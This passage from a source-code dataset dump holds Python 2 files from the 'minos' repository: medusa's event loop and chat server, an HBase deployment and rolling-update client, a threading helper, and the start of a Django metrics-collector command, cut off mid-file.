"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2996,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 93,
"path": "/supervisor/supervisor/medusa/event_loop.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# This is an alternative event loop that supports 'schedulable events'.\n# You can specify an event callback to take place after <n> seconds.\n\n# Important usage note: The granularity of the time-check is limited\n# by the <timeout> argument to 'go()'; if there is little or no\n# activity and you specify a 30-second timeout interval, then the\n# schedule of events may only be checked at those 30-second intervals.\n# In other words, if you need 1-second resolution, you will have to\n# poll at 1-second intervals. This facility is more useful for longer\n# timeouts (\"if the channel doesn't close in 5 minutes, then forcibly\n# close it\" would be a typical usage).\n\nimport asyncore_25 as asyncore\nimport bisect\nimport time\n\nsocket_map = asyncore.socket_map\n\nclass event_loop:\n\n def __init__ (self):\n self.events = []\n self.num_channels = 0\n self.max_channels = 0\n\n def go (self, timeout=30.0, granularity=15):\n global socket_map\n last_event_check = 0\n while socket_map:\n now = int(time.time())\n if (now - last_event_check) >= granularity:\n last_event_check = now\n fired = []\n # yuck. i want my lisp.\n i = j = 0\n while i < len(self.events):\n when, what = self.events[i]\n if now >= when:\n fired.append (what)\n j = i + 1\n else:\n break\n i = i + 1\n if fired:\n self.events = self.events[j:]\n for what in fired:\n what (self, now)\n # sample the number of channels\n n = len(asyncore.socket_map)\n self.num_channels = n\n if n > self.max_channels:\n self.max_channels = n\n asyncore.poll (timeout)\n\n def schedule (self, delta, callback):\n now = int (time.time())\n bisect.insort (self.events, (now + delta, callback))\n\n def __len__ (self):\n return len(self.events)\n\nclass test (asyncore.dispatcher):\n\n def __init__ (self):\n asyncore.dispatcher.__init__ (self)\n\n def handle_connect (self):\n print 'Connected!'\n\n def writable (self):\n return not self.connected\n\n def connect_timeout_callback (self, event_loop, when):\n if not self.connected:\n print 'Timeout on connect'\n self.close()\n\n def periodic_thing_callback (self, event_loop, when):\n print 'A Periodic Event has Occurred!'\n # re-schedule it.\n event_loop.schedule (self, 15, self.periodic_thing_callback)\n\nif __name__ == '__main__':\n import socket\n el = event_loop()\n t = test ()\n t.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n el.schedule (10, t.connect_timeout_callback)\n el.schedule (15, t.periodic_thing_callback)\n t.connect (('squirl', 80))\n el.go(1.0)\n"
},
{
"alpha_fraction": 0.6917330026626587,
"alphanum_fraction": 0.6932026743888855,
"avg_line_length": 38.44444274902344,
"blob_id": "2561a27c544e9cc26f22df88e1cb2ffb692e4964",
"content_id": "b9c4c6fd3141de5b6cfec311666f80516b952323",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16330,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 414,
"path": "/client/deploy_hbase.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport deploy_utils\nimport deploy_zookeeper\nimport os\nimport parallel_deploy\nimport pwd\nimport socket\nimport subprocess\nimport sys\nimport tempfile\nimport urlparse\n\nfrom log import Log\n\n# regionserver must start before master\nALL_JOBS = [\"regionserver\", \"master\"]\n\nSHELL_COMMAND_INFO = {\n \"shell\": (\"org.jruby.Main\", \"run the HBase shell\"),\n \"ruby\": (\"org.jruby.Main\", \"run the ruby shell\"),\n \"hbck\": (\"org.apache.hadoop.hbase.util.HBaseFsck\",\n \"run the hbase 'fsck' tool\"),\n \"htck\": (\"com.xiaomi.infra.hbase.AvailabilityTool\",\n \"run the hbase table availability check tool\"),\n \"hlog\": (\"org.apache.hadoop.hbase.regionserver.wal.HLogPrettyPrinter\",\n \"write-ahead-log analyzer\"),\n \"hfile\": (\"org.apache.hadoop.hbase.io.hfile.HFile\", \"store file analyzer\"),\n \"version\": (\"org.apache.hadoop.hbase.util.VersionInfo\", \"print the version\"),\n}\n\ndef generate_metrics_config(args, host, job_name, instance_id=-1):\n job = args.hbase_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"hbase\", args.hbase_config.cluster.name, job_name, instance_id=instance_id)\n\n ganglia_switch = \"# \"\n if args.hbase_config.cluster.ganglia_address:\n ganglia_switch = \"\"\n config_dict = {\n \"job_name\": job_name,\n \"period\": 10,\n \"data_dir\": supervisor_client.get_log_dir(),\n \"ganglia_address\": args.hbase_config.cluster.ganglia_address,\n \"ganglia_switch\": ganglia_switch,\n }\n\n local_path = \"%s/hadoop-metrics.properties.tmpl\" % deploy_utils.get_template_dir()\n template = deploy_utils.Template(open(local_path, \"r\").read())\n return template.substitute(config_dict)\n\ndef generate_zk_jaas_config(args):\n if not deploy_utils.is_security_enabled(args):\n return \"\"\n\n config_dict = args.hbase_config.configuration.generated_files[\"jaas.conf\"]\n\n for key, value in config_dict.items()[1:]:\n if value != \"true\" and value != \"false\" and value.find(\"\\\"\") == -1:\n config_dict[key] = \"\\\"\" + value + \"\\\"\"\n\n header_line = config_dict[\"headerLine\"]\n return \"Client {\\n %s\\n%s;\\n};\" % (header_line,\n \"\\n\".join([\" %s=%s\" % (key, value)\n for (key, value) in config_dict.iteritems() if key != config_dict.keys()[0]]))\n\n\ndef generate_configs(args, host, job_name, instance_id):\n core_site_xml = deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"core-site.xml\"])\n hdfs_site_xml = deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"hdfs-site.xml\"])\n hbase_site_xml = deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"hbase-site.xml\"])\n hadoop_metrics_properties = generate_metrics_config(args, host, job_name, instance_id)\n zk_jaas_conf = generate_zk_jaas_config(args)\n\n config_files = {\n \"core-site.xml\": core_site_xml,\n \"hdfs-site.xml\": hdfs_site_xml,\n \"hbase-site.xml\": hbase_site_xml,\n \"hadoop-metrics.properties\": hadoop_metrics_properties,\n \"jaas.conf\": zk_jaas_conf,\n }\n config_files.update(args.hbase_config.configuration.raw_files)\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.hbase_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"hbase\", args.hbase_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"hbase-\" + args.hbase_config.cluster.version\n\n component_dir = \"$package_dir/\"\n # must include both [dir]/ and [dir]/* as [dir]/* only import all jars under\n # this dir but we also need access the webapps under this dir.\n jar_dirs = \"%s/:%s/lib/*:%s/*\" % (component_dir, component_dir, component_dir)\n log_level = deploy_utils.get_service_log_level(args, args.hbase_config)\n\n params = job.get_arguments(args, args.hbase_config.cluster, args.hbase_config.jobs,\n args.hbase_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"params\": params,\n }\n\n return script_dict\n\ndef get_hbase_service_config(args):\n args.hbase_config = deploy_utils.get_service_config(args)\n if not args.hbase_config.cluster.zk_cluster:\n Log.print_critical(\n \"hdfs cluster must depends on a zookeeper clusters: %s\" %\n args.hbase_config.cluster.name)\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(),\n script_params)\n\ndef install(args):\n get_hbase_service_config(args)\n deploy_utils.install_service(args, \"hbase\", args.hbase_config, \"hbase\")\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n deploy_utils.cleanup_job(\"hbase\", args.hbase_config,\n host, job_name, instance_id, cleanup_token)\n\ndef cleanup(args):\n get_hbase_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"hbase\", args.hbase_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n # parse the service_config according to the instance_id\n args.hbase_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"hbase\", \"hbase\",\n args.hbase_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n get_hbase_service_config(args)\n\n cleanup_token = deploy_utils.confirm_bootstrap(\"hbase\", args.hbase_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"hbase\",\n args.hbase_config.cluster.name, job_name, host, instance_id)\n # parse the service_config according to the instance_id\n args.hbase_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n config_files = generate_configs(args, host, job_name, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.hbase_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"hbase\", \"hbase\", args.hbase_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n get_hbase_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"hbase\", args.hbase_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n get_hbase_service_config(args)\n\n for job_name in args.job or reversed(ALL_JOBS):\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n get_hbase_service_config(args)\n\n for job_name in args.job or reversed(ALL_JOBS):\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"hbase\", args.hbase_config, host, job_name, instance_id)\n\ndef show(args):\n get_hbase_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.hbase_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef run_shell(args):\n get_hbase_service_config(args)\n\n main_class, options = deploy_utils.parse_shell_command(\n args, SHELL_COMMAND_INFO)\n if not main_class:\n return\n\n # parse the service_config, suppose the instance_id is -1\n args.hbase_config.parse_generated_config_files(args)\n core_site_dict = args.hbase_config.configuration.generated_files[\"core-site.xml\"]\n hdfs_site_dict = args.hbase_config.configuration.generated_files[\"hdfs-site.xml\"]\n hbase_site_dict = args.hbase_config.configuration.generated_files[\"hbase-site.xml\"]\n\n hbase_opts = list()\n for key, value in core_site_dict.iteritems():\n hbase_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in hdfs_site_dict.iteritems():\n hbase_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in hbase_site_dict.iteritems():\n hbase_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n\n if deploy_utils.is_security_enabled(args):\n hbase_opts.append(\"-Djava.security.krb5.conf=%s/krb5-hadoop.conf\" %\n deploy_utils.get_config_dir())\n\n (jaas_fd, jaas_file) = tempfile.mkstemp()\n args.zookeeper_config.parse_generated_config_files(args)\n os.write(jaas_fd, deploy_zookeeper.generate_client_jaas_config(args))\n os.close(jaas_fd)\n hbase_opts.append(\"-Djava.security.auth.login.config=%s\" % jaas_file)\n\n package_root = deploy_utils.get_artifact_package_root(args,\n args.hbase_config.cluster, \"hbase\")\n class_path = \"%s/:%s/lib/*:%s/*\" % (package_root, package_root, package_root)\n\n cmd = [\"java\", \"-cp\", class_path] + hbase_opts + [main_class]\n if args.command[0] == \"shell\":\n cmd += [\"-X+O\", \"%s/bin/hirb.rb\" % package_root]\n cmd += options\n p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n return p.wait()\n\ndef update_hbase_env_sh(args, artifact, version):\n current_path = os.path.abspath(os.path.dirname(\n os.path.realpath(args.package_root)))\n conf_path = \"%s/%s/%s/%s-%s/conf\" % (current_path, args.package_root,\n args.cluster, artifact, version)\n hbase_opts = \"-Djava.security.auth.login.config=$HBASE_CONF_DIR/jaas.conf \"\n hbase_opts += \"-Djava.security.krb5.conf=$HBASE_CONF_DIR/krb5.conf\"\n deploy_utils.append_to_file(\"%s/hbase-env.sh\" % conf_path,\n 'export HBASE_OPTS=\"$HBASE_OPTS %s\"\\n' % hbase_opts)\n\ndef generate_client_config(args, artifact, version):\n config_path = \"%s/%s/%s-%s/conf\" % (args.package_root,\n args.cluster, artifact, version)\n master_host = args.hbase_config.jobs[\"master\"].hosts[0].ip\n config_path = \"%s/%s/%s-%s/conf\" % (args.package_root,\n args.cluster, artifact, version)\n deploy_utils.write_file(\"%s/hbase-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"hbase-site.xml\"]))\n deploy_utils.write_file(\"%s/hadoop-metrics.properties\" % config_path,\n generate_metrics_config(args, master_host, \"master\"))\n deploy_utils.write_file(\"%s/core-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"core-site.xml\"]))\n deploy_utils.write_file(\"%s/hdfs-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.hbase_config.configuration.generated_files[\"hdfs-site.xml\"]))\n args.zookeeper_config.parse_generated_config_files(args)\n deploy_utils.write_file(\"%s/jaas.conf\" % config_path,\n deploy_zookeeper.generate_client_jaas_config(args))\n deploy_utils.write_file(\"%s/krb5.conf\" % config_path,\n args.hbase_config.configuration.raw_files[\"krb5.conf\"])\n update_hbase_env_sh(args, artifact, version)\n\ndef pack(args):\n get_hbase_service_config(args)\n args.hbase_config.parse_generated_config_files(args)\n version = args.hbase_config.cluster.version\n deploy_utils.make_package_dir(args, \"hbase\", args.hbase_config.cluster)\n generate_client_config(args, \"hbase\", version)\n\n if not args.skip_tarball:\n deploy_utils.pack_package(args, \"hbase\", version)\n Log.print_success(\"Pack client utilities for hbase success!\\n\")\n\ndef vacate_region_server(args, ip, port):\n package_root = deploy_utils.get_artifact_package_root(args,\n args.hbase_config.cluster, \"hbase\")\n Log.print_info(\"Vacate region server: \" + ip);\n try:\n host = socket.gethostbyaddr(ip)[0]\n except:\n host = ip\n args.command = [\"ruby\", \"%s/bin/region_mover.rb\" % package_root,\n \"unload\", \"%s:%d\" % (host, port)]\n if run_shell(args) != 0:\n Log.print_critical(\"Unload host %s failed.\" % host);\n\ndef recover_region_server(args, ip, port):\n package_root = deploy_utils.get_artifact_package_root(args,\n args.hbase_config.cluster, \"hbase\")\n Log.print_info(\"Recover region server: \" + ip);\n try:\n host = socket.gethostbyaddr(ip)[0]\n except:\n host = ip\n args.command = [\"ruby\", \"%s/bin/region_mover.rb\" % package_root,\n \"load\", \"%s:%d\" % (host, port)]\n if run_shell(args) != 0:\n Log.print_critical(\"Load host %s failed.\" % host);\n\ndef balance_switch(args, flag):\n fd, filename = tempfile.mkstemp()\n f = os.fdopen(fd, 'w+')\n if flag:\n Log.print_info(\"balance_switch on for cluster: %s\" % args.cluster)\n print >> f, 'balance_switch true'\n else:\n Log.print_info(\"balance_switch off for cluster: %s\" % args.cluster)\n print >> f, 'balance_switch false'\n print >> f, 'exit'\n f.close()\n args.command = [\"shell\", filename]\n ret = run_shell(args)\n os.remove(filename)\n if ret != 0:\n Log.print_critical(\"balance_switch off for cluster: %s failed!\" %\n args.cluster);\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n get_hbase_service_config(args)\n job_name = args.job[0]\n\n if job_name != 'regionserver':\n args.vacate_rs = False\n\n if args.vacate_rs:\n balance_switch(args, False)\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.hbase_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n if not args.skip_confirm:\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n\n port = deploy_utils.get_base_port(\n args.hbase_config.jobs[job_name].base_port, instance_id)\n if args.vacate_rs:\n vacate_region_server(args, hosts[host_id].ip, port)\n\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"hbase\",\n args.hbase_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"hbase\",\n args.hbase_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n\n if args.vacate_rs:\n recover_region_server(args, hosts[host_id].ip, port)\n wait_time = args.time_interval\n\n if args.vacate_rs:\n balance_switch(args, True)\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.49625054001808167,
"alphanum_fraction": 0.5090427994728088,
"avg_line_length": 29.0264892578125,
"blob_id": "f56a7a9a7ee7841ccb25b91879059ee6434b800d",
"content_id": "52a71c9861f5c9370040c49d325cd624ef93e166",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4534,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 151,
"path": "/supervisor/supervisor/medusa/chat_server.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n#\n# Author: Sam Rushing <[email protected]>\n# Copyright 1997-2000 by Sam Rushing\n# All Rights Reserved.\n#\n\nRCS_ID = '$Id: chat_server.py,v 1.4 2002/03/20 17:37:48 amk Exp $'\n\nimport string\n\nVERSION = string.split(RCS_ID)[2]\n\nimport socket\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\nimport status_handler\n\nclass chat_channel (asynchat.async_chat):\n\n def __init__ (self, server, sock, addr):\n asynchat.async_chat.__init__ (self, sock)\n self.server = server\n self.addr = addr\n self.set_terminator ('\\r\\n')\n self.data = ''\n self.nick = None\n self.push ('nickname?: ')\n\n def collect_incoming_data (self, data):\n self.data = self.data + data\n\n def found_terminator (self):\n line = self.data\n self.data = ''\n if self.nick is None:\n self.nick = string.split (line)[0]\n if not self.nick:\n self.nick = None\n self.push ('huh? gimmee a nickname: ')\n else:\n self.greet()\n else:\n if not line:\n pass\n elif line[0] != '/':\n self.server.push_line (self, line)\n else:\n self.handle_command (line)\n\n def greet (self):\n self.push ('Hello, %s\\r\\n' % self.nick)\n num_channels = len(self.server.channels)-1\n if num_channels == 0:\n self.push ('[Kinda lonely in here... you\\'re the only caller!]\\r\\n')\n else:\n self.push ('[There are %d other callers]\\r\\n' % (len(self.server.channels)-1))\n nicks = map (lambda x: x.get_nick(), self.server.channels.keys())\n self.push (string.join (nicks, '\\r\\n ') + '\\r\\n')\n self.server.push_line (self, '[joined]')\n\n def handle_command (self, command):\n import types\n command_line = string.split(command)\n name = 'cmd_%s' % command_line[0][1:]\n if hasattr (self, name):\n # make sure it's a method...\n method = getattr (self, name)\n if type(method) == type(self.handle_command):\n method (command_line[1:])\n else:\n self.push ('unknown command: %s' % command_line[0])\n\n def cmd_quit (self, args):\n self.server.push_line (self, '[left]')\n self.push ('Goodbye!\\r\\n')\n self.close_when_done()\n\n # alias for '/quit' - '/q'\n cmd_q = cmd_quit\n\n def push_line (self, nick, line):\n self.push ('%s: %s\\r\\n' % (nick, line))\n\n def handle_close (self):\n self.close()\n\n def close (self):\n del self.server.channels[self]\n asynchat.async_chat.close (self)\n\n def get_nick (self):\n if self.nick is not None:\n return self.nick\n else:\n return 'Unknown'\n\nclass chat_server (asyncore.dispatcher):\n\n SERVER_IDENT = 'Chat Server (V%s)' % VERSION\n\n channel_class = chat_channel\n\n spy = 1\n\n def __init__ (self, ip='', port=8518):\n asyncore.dispatcher.__init__(self)\n self.port = port\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.bind ((ip, port))\n print '%s started on port %d' % (self.SERVER_IDENT, port)\n self.listen (5)\n self.channels = {}\n self.count = 0\n\n def handle_accept (self):\n conn, addr = self.accept()\n self.count = self.count + 1\n print 'client #%d - %s:%d' % (self.count, addr[0], addr[1])\n self.channels[self.channel_class (self, conn, addr)] = 1\n\n def push_line (self, from_channel, line):\n nick = from_channel.get_nick()\n if self.spy:\n print '%s: %s' % (nick, line)\n for c in self.channels.keys():\n if c is not from_channel:\n c.push ('%s: %s\\r\\n' % (nick, line))\n\n def status (self):\n lines = [\n '<h2>%s</h2>' % self.SERVER_IDENT,\n '<br>Listening on Port: %d' % self.port,\n '<br><b>Total Sessions:</b> %d' % self.count,\n '<br><b>Current Sessions:</b> %d' % (len(self.channels))\n ]\n return status_handler.lines_producer (lines)\n\n def writable (self):\n return 0\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) > 1:\n port = string.atoi (sys.argv[1])\n else:\n port = 8518\n\n s = chat_server ('', port)\n asyncore.loop()\n"
},
{
"alpha_fraction": 0.6844262480735779,
"alphanum_fraction": 0.6844262480735779,
"avg_line_length": 26.037036895751953,
"blob_id": "bbca79a8d8ed8ff443f08b7f28557081d27df7d1",
"content_id": "673c09d32ac430778f5604ee645e3dc8c310f9f1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 27,
"path": "/client/parallel_deploy.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import deploy_utils\nimport threading\n\nclass DeployThread(threading.Thread):\n def __init__(self, func, para_list_set, name=''):\n threading.Thread.__init__(self)\n self.name = name\n self.func = func\n self.para_list_set = para_list_set\n\n def run(self):\n for task_id in range(len(self.para_list_set)):\n apply(self.func, self.para_list_set[task_id])\n\n\ndef start_deploy_threads(func, task_list):\n parallelism = len(task_list)\n threads = []\n for thread_id in range(parallelism):\n deploy_thread = DeployThread(func, para_list_set=task_list[thread_id])\n threads.append(deploy_thread)\n\n for index in range(parallelism):\n threads[index].start()\n\n for index in range(parallelism):\n threads[index].join()\n\n\n"
},
{
"alpha_fraction": 0.683671236038208,
"alphanum_fraction": 0.685186505317688,
"avg_line_length": 37.281768798828125,
"blob_id": "1d4c6034d144d4a03f064d7964fc6ae1e3e8585e",
"content_id": "c04f4299dd11dab11b29354d33c80ea1516e0e98",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13859,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 362,
"path": "/owl/collector/management/commands/collect.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import ConfigParser\nimport Queue\nimport argparse\nimport datetime\nimport json\nimport logging\nimport multiprocessing\nimport os\nimport random\nimport sys\nimport threading\nimport time\nimport urllib2\n\nimport deploy_utils\n\nfrom optparse import make_option\nfrom os import path\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db import connection\nfrom django.db import transaction\nfrom django.utils import timezone\n\nfrom monitor import dbutil\nfrom monitor.models import Service, Cluster, Job, Task\nfrom monitor.models import Status\n\nfrom twisted.internet import reactor\nfrom twisted.web import client\n\n# For debugging\nimport gc\n\nfrom metrics_updater import update_metrics_in_process\nfrom status_updater import update_status_in_process\nfrom metrics_aggregator import aggregate_region_operation_metric_in_process\nfrom collect_utils import QueueTask\nfrom collect_utils import METRIC_TASK_TYPE, STATUS_TASK_TYPE, AGGREGATE_TASK_TYPE\n\n# the number of multiprocesses\nPROCESS_NUM = 6\n\nQUEUE_TASK_CALLBACK = {\n METRIC_TASK_TYPE: update_metrics_in_process,\n STATUS_TASK_TYPE: update_status_in_process,\n AGGREGATE_TASK_TYPE: aggregate_region_operation_metric_in_process, \n}\n\nlogger = logging.getLogger(__name__)\n\ndef process_queue_task(input_queue, output_queue):\n connection.close()\n while True:\n try:\n queue_task = input_queue.get(timeout=0.5)\n QUEUE_TASK_CALLBACK[queue_task.task_type](output_queue,\n queue_task.task_data)\n except Queue.Empty:\n logger.warning(\"Input Queue is empty in process %d.\" % os.getpid())\n continue\n\nclass CollectorConfig:\n class Service:\n def __init__(self, options, config, name):\n # Parse service config.\n self.name = name\n self.jobs = config.get(name, \"jobs\").split()\n self.clusters = {}\n for cluster_name in config.get(name, \"clusters\").split():\n args = argparse.Namespace()\n args.service = self.name\n args.cluster = cluster_name\n # Parse cluster config.\n self.clusters[cluster_name] = deploy_utils.get_service_config(args)\n self.metric_url = config.get(name, \"metric_url\")\n self.need_analyze = True # analyze for default\n if config.has_option(name, \"need_analyze\"):\n self.need_analyze = config.getboolean(name, \"need_analyze\")\n\n def __init__(self, args, options):\n # Parse collector config.\n self.options = options\n config_path = os.path.join(deploy_utils.get_config_dir(), 'owl',\n self.options['collector_cfg'])\n self.args = args\n self.config = self.parse_config_file(config_path)\n self.services = {}\n for service_name in self.config.get(\"collector\", \"services\").split():\n self.services[service_name] = CollectorConfig.Service(options,\n self.config, service_name)\n self.period = self.config.getint(\"collector\", \"period\")\n\n def parse_config_file(self, config_path):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.optionxform = str\n logger.info(\"Parsing config file: %s\", config_path)\n if not config_parser.read(config_path):\n logger.critical(\"Can't parse config file: %s\", config_path)\n sys.exit(1)\n logger.info(\"Successfully parsed config file\")\n return config_parser\n\nclass MetricSource:\n def __init__(self, collector_config, task):\n self.collector_config = collector_config\n self.task = task\n self.url = \"http://%s:%d%s\" % (\n task.host, task.port,\n self.collector_config.config.get(task.job.cluster.service.name, \"metric_url\"))\n self.need_analyze = collector_config.services[task.job.cluster.service.name].need_analyze\n\n def schedule_next_fetch(self, input_queue):\n next_time = self.start_time + self.collector_config.period\n end_time = time.time()\n if end_time < next_time:\n wait_time = next_time - end_time\n logger.info(\"%r waiting %f seconds for %s...\" ,\n self.task, wait_time, self.url)\n # reactor.callLater is NOT thread-safe but reactor.callFromThread is, so\n # we put the callLater to the main loop.\n reactor.callFromThread(reactor.callLater, wait_time,\n self.fetch_metrics, input_queue)\n else:\n # We are behind the schedule, fetch the metrics right away.\n reactor.callFromThread(self.fetch_metrics, input_queue)\n\n def fetch_metrics(self, input_queue):\n logger.info(\"%r fetching %s...\", self.task, self.url)\n self.start_time = time.time()\n # Always use utc time with timezone info, see:\n # https://docs.djangoproject.com/en/1.4/topics/i18n/timezones/#naive-and-aware-datetime-objects\n self.task.last_attempt_time = datetime.datetime.utcfromtimestamp(\n self.start_time).replace(tzinfo=timezone.utc)\n client.getPage(str(self.url), timeout=self.collector_config.period - 1,\n followRedirect=False).addCallbacks(\n callback=self.success_callback, errback=self.error_callback,\n callbackArgs=[input_queue], errbackArgs=[input_queue])\n\n def success_callback(self, data, input_queue):\n logger.info(\"%r fetched %d bytes\", self.task, len(data))\n try:\n # Save the raw data before passing it, in case the data is invalid and\n # throws an exception.\n self.task.last_metrics_raw = data\n self.task.last_status = Status.OK\n self.task.last_message = \"Success\"\n self.task.last_success_time = self.task.last_attempt_time\n input_queue.put(QueueTask(METRIC_TASK_TYPE, self.task))\n except Exception as e:\n logger.warning(\"%r failed to process result: %r\", self.task, e)\n self.schedule_next_fetch(input_queue)\n\n def error_callback(self, error, input_queue):\n logger.warning(\"%r failed to fetch: %r\", self.task, error)\n try:\n self.task.last_metrics_raw = None\n self.task.last_status = Status.ERROR\n self.task.last_message = \"Error: %r\" % error\n input_queue.put(QueueTask(METRIC_TASK_TYPE, self.task))\n except Exception as e:\n logger.warning(\"%r failed to process error: %r\", self.task, e)\n self.schedule_next_fetch(input_queue)\n\n# Region operation include : get, multiput, multidelete, checkAndPut, BulkDelete etc.\n# one region operation include operation_NumOps, operation_AvgTime, operation_MaxTime and\n# operation.MinTime. We aggregate operation metrics of regions to compute operation metrics\n# for table and cluster\nclass RegionOperationMetricAggregator:\n def __init__(self, collector_config):\n self.collector_config = collector_config\n\n def produce_aggregate_task(self, input_queue):\n 